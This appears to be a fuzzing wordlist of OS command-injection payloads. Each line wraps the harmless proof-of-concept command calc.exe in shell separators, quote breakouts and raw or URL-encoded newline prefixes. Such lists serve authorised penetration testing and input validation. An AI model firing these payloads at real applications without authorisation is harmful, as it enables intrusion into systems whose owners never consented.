||calc.exe||
||calc.exe
||`calc.exe`||
||`calc.exe`
|calc.exe|
|calc.exe
|`calc.exe`|
|`calc.exe`
calc.exe
`calc.exe`
\r\n||calc.exe||
\r\n||calc.exe
\r\n||`calc.exe`||
\r\n||`calc.exe`
\r\n|calc.exe|
\r\n|calc.exe
\r\n|`calc.exe`|
\r\n|`calc.exe`
\r\ncalc.exe
\r\n`calc.exe`
\r\n\'||calc.exe||\'
\r\n\'||calc.exe\'
\r\n\'||`calc.exe`||\'
\r\n\'||`calc.exe`\'
\r\n\'||\'calc.exe
\r\n\'|calc.exe|\'
\r\n\'|calc.exe\'
\r\n\'|`calc.exe`|\'
\r\n\'|`calc.exe`\'
\r\n\'|\'calc.exe
\r\n\';calc.exe\'
\r\n\';calc.exe;\'
\r\n\';`calc.exe`\'
\r\n\';`calc.exe`;\'
\r\n\';\'calc.exe
\r\n\'&calc.exe\'
\r\n\'&calc.exe&\'
\r\n\'&`calc.exe`\'
\r\n\'&`calc.exe`&\'
\r\n\'&\'calc.exe
\r\n\'&&calc.exe\'
\r\n\'&&calc.exe&&\'
\r\n\'&&`calc.exe`\'
\r\n\'&&`calc.exe`&&\'
\r\n\'&&\'calc.exe
\r\n\"||calc.exe||\"
\r\n\"||calc.exe\"
\r\n\"||`calc.exe`||\"
\r\n\"||`calc.exe`\"
\r\n\"||\"calc.exe
\r\n\"|calc.exe|\"
\r\n\"|calc.exe\"
\r\n\"|`calc.exe`|\"
\r\n\"|`calc.exe`\"
\r\n\"|\"calc.exe
\r\n\";calc.exe\"
\r\n\";calc.exe;\"
\r\n\";`calc.exe`\"
\r\n\";`calc.exe`;\"
\r\n\";\"calc.exe
\r\n\"&calc.exe\"
\r\n\"&calc.exe&\"
\r\n\"&`calc.exe`\"
\r\n\"&`calc.exe`&\"
\r\n\"&\"calc.exe
\r\n\"&&calc.exe\"
\r\n\"&&calc.exe&&\"
\r\n\"&&`calc.exe`\"
\r\n\"&&`calc.exe`&&\"
\r\n\"&&\"calc.exe
\r\n;calc.exe;
\r\n;calc.exe
\r\n;`calc.exe`;
\r\n;`calc.exe`
\r\n'||calc.exe||'
\r\n'||calc.exe'
\r\n'||`calc.exe`||'
\r\n'||`calc.exe`'
\r\n'||'calc.exe
\r\n'|calc.exe|'
\r\n'|calc.exe'
\r\n'|`calc.exe`|'
\r\n'|`calc.exe`'
\r\n'|'calc.exe
\r\n';calc.exe;'
\r\n';calc.exe'
\r\n';`calc.exe`;'
\r\n';`calc.exe`'
\r\n';'calc.exe
\r\n'&calc.exe'
\r\n'&calc.exe&'
\r\n'&`calc.exe`'
\r\n'&`calc.exe`&'
\r\n'&'calc.exe
\r\n'&&calc.exe'
\r\n'&&calc.exe&&'
\r\n'&&`calc.exe`'
\r\n'&&`calc.exe`&&'
\r\n'&&'calc.exe
\r\n&calc.exe&
\r\n&calc.exe
\r\n&`calc.exe`&
\r\n&`calc.exe`
\r\n&&calc.exe&&
\r\n&&calc.exe
\r\n&&`calc.exe`&&
\r\n&&`calc.exe`
\r\n"||calc.exe||"
\r\n"||calc.exe"
\r\n"||`calc.exe`||"
\r\n"||`calc.exe`"
\r\n"||"calc.exe
\r\n"|calc.exe|"
\r\n"|calc.exe"
\r\n"|`calc.exe`|"
\r\n"|`calc.exe`"
\r\n"|"calc.exe
\r\n";calc.exe;"
\r\n";calc.exe"
\r\n";`calc.exe`;"
\r\n";`calc.exe`"
\r\n";"calc.exe
\r\n"&calc.exe&"
\r\n"&calc.exe"
\r\n"&`calc.exe`&"
\r\n"&`calc.exe`"
\r\n"&&calc.exe&&"
\r\n"&&calc.exe"
\r\n"&&`calc.exe`&&"
\r\n"&&`calc.exe`"
\r\n"&&"calc.exe
\r\n"&"calc.exe
\n||calc.exe||
\n||calc.exe
\n||`calc.exe`||
\n||`calc.exe`
\n|calc.exe|
\n|calc.exe
\n|`calc.exe`|
\n|`calc.exe`
\ncalc.exe
\n`calc.exe`
\n\'||calc.exe||\'
\n\'||calc.exe\'
\n\'||`calc.exe`||\'
\n\'||`calc.exe`\'
\n\'||\'calc.exe
\n\'|calc.exe|\'
\n\'|calc.exe\'
\n\'|`calc.exe`|\'
\n\'|`calc.exe`\'
\n\'|\'calc.exe
\n\';calc.exe\'
\n\';calc.exe;\'
\n\';`calc.exe`\'
\n\';`calc.exe`;\'
\n\';\'calc.exe
\n\'&calc.exe\'
\n\'&calc.exe&\'
\n\'&`calc.exe`\'
\n\'&`calc.exe`&\'
\n\'&\'calc.exe
\n\'&&calc.exe\'
\n\'&&calc.exe&&\'
\n\'&&`calc.exe`\'
\n\'&&`calc.exe`&&\'
\n\'&&\'calc.exe
\n\"||calc.exe||\"
\n\"||calc.exe\"
\n\"||`calc.exe`||\"
\n\"||`calc.exe`\"
\n\"||\"calc.exe
\n\"|calc.exe|\"
\n\"|calc.exe\"
\n\"|`calc.exe`|\"
\n\"|`calc.exe`\"
\n\"|\"calc.exe
\n\";calc.exe\"
\n\";calc.exe;\"
\n\";`calc.exe`\"
\n\";`calc.exe`;\"
\n\";\"calc.exe
\n\"&calc.exe\"
\n\"&calc.exe&\"
\n\"&`calc.exe`\"
\n\"&`calc.exe`&\"
\n\"&\"calc.exe
\n\"&&calc.exe\"
\n\"&&calc.exe&&\"
\n\"&&`calc.exe`\"
\n\"&&`calc.exe`&&\"
\n\"&&\"calc.exe
\n;calc.exe;
\n;calc.exe
\n;`calc.exe`;
\n;`calc.exe`
\n'||calc.exe||'
\n'||calc.exe'
\n'||`calc.exe`||'
\n'||`calc.exe`'
\n'||'calc.exe
\n'|calc.exe|'
\n'|calc.exe'
\n'|`calc.exe`|'
\n'|`calc.exe`'
\n'|'calc.exe
\n';calc.exe;'
\n';calc.exe'
\n';`calc.exe`;'
\n';`calc.exe`'
\n';'calc.exe
\n'&calc.exe'
\n'&calc.exe&'
\n'&`calc.exe`'
\n'&`calc.exe`&'
\n'&'calc.exe
\n'&&calc.exe'
\n'&&calc.exe&&'
\n'&&`calc.exe`'
\n'&&`calc.exe`&&'
\n'&&'calc.exe
\n&calc.exe&
\n&calc.exe
\n&`calc.exe`&
\n&`calc.exe`
\n&&calc.exe&&
\n&&calc.exe
\n&&`calc.exe`&&
\n&&`calc.exe`
\n"||calc.exe||"
\n"||calc.exe"
\n"||`calc.exe`||"
\n"||`calc.exe`"
\n"||"calc.exe
\n"|calc.exe|"
\n"|calc.exe"
\n"|`calc.exe`|"
\n"|`calc.exe`"
\n"|"calc.exe
\n";calc.exe;"
\n";calc.exe"
\n";`calc.exe`;"
\n";`calc.exe`"
\n";"calc.exe
\n"&calc.exe&"
\n"&calc.exe"
\n"&`calc.exe`&"
\n"&`calc.exe`"
\n"&&calc.exe&&"
\n"&&calc.exe"
\n"&&`calc.exe`&&"
\n"&&`calc.exe`"
\n"&&"calc.exe
\n"&"calc.exe
\'||calc.exe||\'
\'||calc.exe\'
\'||`calc.exe`||\'
\'||`calc.exe`\'
\'||\'calc.exe
\'|calc.exe|\'
\'|calc.exe\'
\'|`calc.exe`|\'
\'|`calc.exe`\'
\'|\'calc.exe
\';calc.exe\'
\';calc.exe;\'
\';`calc.exe`\'
\';`calc.exe`;\'
\';\'calc.exe
\'&calc.exe\'
\'&calc.exe&\'
\'&`calc.exe`\'
\'&`calc.exe`&\'
\'&\'calc.exe
\'&&calc.exe\'
\'&&calc.exe&&\'
\'&&`calc.exe`\'
\'&&`calc.exe`&&\'
\'&&\'calc.exe
\"||calc.exe||\"
\"||calc.exe\"
\"||`calc.exe`||\"
\"||`calc.exe`\"
\"||\"calc.exe
\"|calc.exe|\"
\"|calc.exe\"
\"|`calc.exe`|\"
\"|`calc.exe`\"
\"|\"calc.exe
\";calc.exe\"
\";calc.exe;\"
\";`calc.exe`\"
\";`calc.exe`;\"
\";\"calc.exe
\"&calc.exe\"
\"&calc.exe&\"
\"&`calc.exe`\"
\"&`calc.exe`&\"
\"&\"calc.exe
\"&&calc.exe\"
\"&&calc.exe&&\"
\"&&`calc.exe`\"
\"&&`calc.exe`&&\"
\"&&\"calc.exe
';calc.exe
;calc.exe;
;calc.exe
;`calc.exe`;
;`calc.exe`
'||calc.exe||'
'||calc.exe'
'||`calc.exe`||'
'||`calc.exe`'
'||'calc.exe
'|calc.exe|'
'|calc.exe'
'|`calc.exe`|'
'|`calc.exe`'
'|'calc.exe
';calc.exe;'
';calc.exe'
';`calc.exe`;'
';`calc.exe`'
';'calc.exe
'&calc.exe'
'&calc.exe&'
'&`calc.exe`'
'&`calc.exe`&'
'&'calc.exe
'&&calc.exe'
'&&calc.exe&&'
'&&`calc.exe`'
'&&`calc.exe`&&'
'&&'calc.exe
&calc.exe&
&calc.exe
&`calc.exe`&
&`calc.exe`
&&calc.exe&&
&&calc.exe
&&`calc.exe`&&
&&`calc.exe`
%0d%0a||calc.exe||
%0d%0a||calc.exe
%0d%0a||`calc.exe`||
%0d%0a||`calc.exe`
%0d%0a|calc.exe|
%0d%0a|calc.exe
%0d%0a|`calc.exe`|
%0d%0a|`calc.exe`
%0d%0acalc.exe
%0d%0a`calc.exe`
%0d%0a\'||calc.exe||\'
%0d%0a\'||calc.exe\'
%0d%0a\'||`calc.exe`||\'
%0d%0a\'||`calc.exe`\'
%0d%0a\'||\'calc.exe
%0d%0a\'|calc.exe|\'
%0d%0a\'|calc.exe\'
%0d%0a\'|`calc.exe`|\'
%0d%0a\'|`calc.exe`\'
%0d%0a\'|\'calc.exe
%0d%0a\';calc.exe\'
%0d%0a\';calc.exe;\'
%0d%0a\';`calc.exe`\'
%0d%0a\';`calc.exe`;\'
%0d%0a\';\'calc.exe
%0d%0a\'&calc.exe\'
%0d%0a\'&calc.exe&\'
%0d%0a\'&`calc.exe`\'
%0d%0a\'&`calc.exe`&\'
%0d%0a\'&\'calc.exe
%0d%0a\'&&calc.exe\'
%0d%0a\'&&calc.exe&&\'
%0d%0a\'&&`calc.exe`\'
%0d%0a\'&&`calc.exe`&&\'
%0d%0a\'&&\'calc.exe
%0d%0a\"||calc.exe||\"
%0d%0a\"||calc.exe\"
%0d%0a\"||`calc.exe`||\"
%0d%0a\"||`calc.exe`\"
%0d%0a\"||\"calc.exe
%0d%0a\"|calc.exe|\"
%0d%0a\"|calc.exe\"
%0d%0a\"|`calc.exe`|\"
%0d%0a\"|`calc.exe`\"
%0d%0a\"|\"calc.exe
%0d%0a\";calc.exe\"
%0d%0a\";calc.exe;\"
%0d%0a\";`calc.exe`\"
%0d%0a\";`calc.exe`;\"
%0d%0a\";\"calc.exe
%0d%0a\"&calc.exe\"
%0d%0a\"&calc.exe&\"
%0d%0a\"&`calc.exe`\"
%0d%0a\"&`calc.exe`&\"
%0d%0a\"&\"calc.exe
%0d%0a\"&&calc.exe\"
%0d%0a\"&&calc.exe&&\"
%0d%0a\"&&`calc.exe`\"
%0d%0a\"&&`calc.exe`&&\"
%0d%0a\"&&\"calc.exe
%0d%0a;calc.exe;
%0d%0a;calc.exe
%0d%0a;`calc.exe`;
%0d%0a;`calc.exe`
%0d%0a'||calc.exe||'
%0d%0a'||calc.exe'
%0d%0a'||`calc.exe`||'
%0d%0a'||`calc.exe`'
%0d%0a'||'calc.exe
%0d%0a'|calc.exe|'
%0d%0a'|calc.exe'
%0d%0a'|`calc.exe`|'
%0d%0a'|`calc.exe`'
%0d%0a'|'calc.exe
%0d%0a';calc.exe;'
%0d%0a';calc.exe'
%0d%0a';`calc.exe`;'
%0d%0a';`calc.exe`'
%0d%0a';'calc.exe
%0d%0a'&calc.exe'
%0d%0a'&calc.exe&'
%0d%0a'&`calc.exe`'
%0d%0a'&`calc.exe`&'
%0d%0a'&'calc.exe
%0d%0a'&&calc.exe'
%0d%0a'&&calc.exe&&'
%0d%0a'&&`calc.exe`'
%0d%0a'&&`calc.exe`&&'
%0d%0a'&&'calc.exe
%0d%0a&calc.exe&
%0d%0a&calc.exe
%0d%0a&`calc.exe`&
%0d%0a&`calc.exe`
%0d%0a&&calc.exe&&
%0d%0a&&calc.exe
%0d%0a&&`calc.exe`&&
%0d%0a&&`calc.exe`
%0d%0a"||calc.exe||"
%0d%0a"||calc.exe"
%0d%0a"||`calc.exe`||"
%0d%0a"||`calc.exe`"
%0d%0a"||"calc.exe
%0d%0a"|calc.exe|"
%0d%0a"|calc.exe"
%0d%0a"|`calc.exe`|"
%0d%0a"|`calc.exe`"
%0d%0a"|"calc.exe
%0d%0a";calc.exe;"
%0d%0a";calc.exe"
%0d%0a";`calc.exe`;"
%0d%0a";`calc.exe`"
%0d%0a";"calc.exe
%0d%0a"&calc.exe&"
%0d%0a"&calc.exe"
%0d%0a"&`calc.exe`&"
%0d%0a"&`calc.exe`"
%0d%0a"&&calc.exe&&"
%0d%0a"&&calc.exe"
%0d%0a"&&`calc.exe`&&"
%0d%0a"&&`calc.exe`"
%0d%0a"&&"calc.exe
%0d%0a"&"calc.exe
%0a||calc.exe||
%0a||calc.exe
%0a||`calc.exe`||
%0a||`calc.exe`
%0a|calc.exe|
%0a|calc.exe
%0a|`calc.exe`|
%0a|`calc.exe`
%0acalc.exe
%0a`calc.exe`
%0a\'||calc.exe||\'
%0a\'||calc.exe\'
%0a\'||`calc.exe`||\'
%0a\'||`calc.exe`\'
%0a\'||\'calc.exe
%0a\'|calc.exe|\'
%0a\'|calc.exe\'
%0a\'|`calc.exe`|\'
%0a\'|`calc.exe`\'
%0a\'|\'calc.exe
%0a\';calc.exe\'
%0a\';calc.exe;\'
%0a\';`calc.exe`\'
%0a\';`calc.exe`;\'
%0a\';\'calc.exe
%0a\'&calc.exe\'
%0a\'&calc.exe&\'
%0a\'&`calc.exe`\'
%0a\'&`calc.exe`&\'
%0a\'&\'calc.exe
%0a\'&&calc.exe\'
%0a\'&&calc.exe&&\'
%0a\'&&`calc.exe`\'
%0a\'&&`calc.exe`&&\'
%0a\'&&\'calc.exe
%0a\"||calc.exe||\"
%0a\"||calc.exe\"
%0a\"||`calc.exe`||\"
%0a\"||`calc.exe`\"
%0a\"||\"calc.exe
%0a\"|calc.exe|\"
%0a\"|calc.exe\"
%0a\"|`calc.exe`|\"
%0a\"|`calc.exe`\"
%0a\"|\"calc.exe
%0a\";calc.exe\"
%0a\";calc.exe;\"
%0a\";`calc.exe`\"
%0a\";`calc.exe`;\"
%0a\";\"calc.exe
%0a\"&calc.exe\"
%0a\"&calc.exe&\"
%0a\"&`calc.exe`\"
%0a\"&`calc.exe`&\"
%0a\"&\"calc.exe
%0a\"&&calc.exe\"
%0a\"&&calc.exe&&\"
%0a\"&&`calc.exe`\"
%0a\"&&`calc.exe`&&\"
%0a\"&&\"calc.exe
%0a;calc.exe;
%0a;calc.exe
%0a;`calc.exe`;
%0a;`calc.exe`
%0a'||calc.exe||'
%0a'||calc.exe'
%0a'||`calc.exe`||'
%0a'||`calc.exe`'
%0a'||'calc.exe
%0a'|calc.exe|'
%0a'|calc.exe'
%0a'|`calc.exe`|'
%0a'|`calc.exe`'
%0a'|'calc.exe
%0a';calc.exe;'
%0a';calc.exe'
%0a';`calc.exe`;'
%0a';`calc.exe`'
%0a';'calc.exe
%0a'&calc.exe'
%0a'&calc.exe&'
%0a'&`calc.exe`'
%0a'&`calc.exe`&'
%0a'&'calc.exe
%0a'&&calc.exe'
%0a'&&calc.exe&&'
%0a'&&`calc.exe`'
%0a'&&`calc.exe`&&'
%0a'&&'calc.exe
%0a&calc.exe&
%0a&calc.exe
%0a&`calc.exe`&
%0a&`calc.exe`
%0a&&calc.exe&&
%0a&&calc.exe
%0a&&`calc.exe`&&
%0a&&`calc.exe`
%0a"||calc.exe||"
%0a"||calc.exe"
%0a"||`calc.exe`||"
%0a"||`calc.exe`"
%0a"||"calc.exe
%0a"|calc.exe|"
%0a"|calc.exe"
%0a"|`calc.exe`|"
%0a"|`calc.exe`"
%0a"|"calc.exe
%0a";calc.exe;"
%0a";calc.exe"
%0a";`calc.exe`;"
%0a";`calc.exe`"
%0a";"calc.exe
%0a"&calc.exe&"
%0a"&calc.exe"
%0a"&`calc.exe`&"
%0a"&`calc.exe`"
%0a"&&calc.exe&&"
%0a"&&calc.exe"
%0a"&&`calc.exe`&&"
%0a"&&`calc.exe`"
%0a"&&"calc.exe
%0a"&"calc.exe
"||calc.exe||"
"||calc.exe"
"||`calc.exe`||"
"||`calc.exe`"
"||"calc.exe
"|calc.exe|"
"|calc.exe"
"|`calc.exe`|"
"|`calc.exe`"
"|"calc.exe
";calc.exe;"
";calc.exe"
";`calc.exe`;"
";`calc.exe`"
";"calc.exe
"&calc.exe&"
"&calc.exe"
"&`calc.exe`&"
"&`calc.exe`"
"&&calc.exe&&"
"&&calc.exe"
"&&`calc.exe`&&"
"&&`calc.exe`"
"&&"calc.exe
"&"calc.exe
